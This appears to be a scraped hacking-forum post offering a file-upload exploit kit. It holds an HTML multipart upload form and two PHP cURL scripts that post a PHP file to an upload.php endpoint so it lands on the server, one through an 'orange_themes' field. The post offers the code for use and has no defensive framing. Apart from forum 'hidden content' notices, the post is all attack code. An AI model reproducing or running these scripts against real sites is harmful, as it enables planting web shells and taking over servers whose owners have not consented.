tutorial exploit post file upload 
script html
[hide/]
exploit script php
exploit script PHP 2
tutorial
script html
View hidden content is available for registered users!
HTML:
<html>
<body>
<form enctype="multipart/form-data" action="http://127.0.0.1/upload.php" method="post">
File: <input name="files[]" type="file" /><br />
<input type="submit" value="submit!" />
</form>
</body>
</html>exploit script php
View hidden content is available for registered users!
PHP:
<?php
$uploadfile="file.php";
$ch = curl_init("http://127.0.0.1/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('orange_themes'=>"@$uploadfile")); curl_setopt($ch,
CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch); print "$postResult";
?>exploit script PHP 2
View hidden content is available for registered users!
PHP:
<?php
$url = "http://127.0.0.1/upload.php"; // put URL Here
$post = array
(
"file" => "@file.jpg",
"name" => "file.php"
);
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 5);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
@curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
$data = curl_exec ($ch);
curl_close ($ch);
echo $data;
?>tutorial
View hidden content is available for registered users!
